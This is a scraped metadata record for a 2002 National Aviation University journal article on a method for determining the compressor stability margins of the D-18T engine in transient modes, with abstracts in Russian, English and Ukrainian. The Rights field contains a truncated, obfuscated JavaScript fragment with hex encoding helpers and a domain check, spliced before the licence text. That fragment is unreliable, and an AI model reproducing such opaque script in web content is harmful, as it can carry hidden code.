Record Details

Метод определения запас устойчивости каскадов компрессора двигателя д-18т на переходных режимах

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title Метод определения запас устойчивости каскадов компрессора двигателя д-18т на переходных режимах
Method for determining the margin of stability of the cascades of the d-18t engine compressor in transient modes
МЕТОД ВИЗНАЧЕННЯ ЗАПАСІВ СТІЙКОСТІ КАСКАДІВ КОМПРЕСОРА ДВИГУНА Д-18Т НА ПЕРЕХІДНИХ РЕЖИМАХ
 
Creator Кулик, М. С.; Національний авіаційний університет
Панін, В. В.; Національний авіаційний університет
Кінащук, І. Ф.; Національний авіаційний університет
 
Subject

629.7.036.34


629.7.036.34


629.7.036.34
 
Description Рассмотрен метод определения запасов устойчивости каскадов компрессора авиационных трехвальная газотурбинных двигателей на переходных режимах работы по данным объективного средств кон¬тролю. Приведены результаты апробации этого метода на примере двигателя Д-18Т.
The method of determining the stability margins of the compressor stages of aircraft long-term gas turbine engines in transient modes of operation according to the objective means of control is considered. The results of approbation of this method on the example of the D-18T engine are given.
Розглянуто метод визначення запасів стійкості каскадів компресора авіаційних тривальних газотурбінних двигунів на перехідних режимах роботи за даними об ’єктивних засобів кон­тролю. Наведено результати апробації цього методу на прикладі двигуна Д-18Т.
 
Publisher National Aviation University
 
Contributor


 
Date 2021-03-15
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/15186
10.18372/2306-1472.14.15186
 
Source Proceedings of the National Aviation University; Том 14, № 3 (2002); 14-18
Вестник Национального авиационного университета; Том 14, № 3 (2002); 14-18
Вісник Національного Авіаційного Університету; Том 14, № 3 (2002); 14-18
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).
 

Технічна підтримка: НДІІТТ НАУ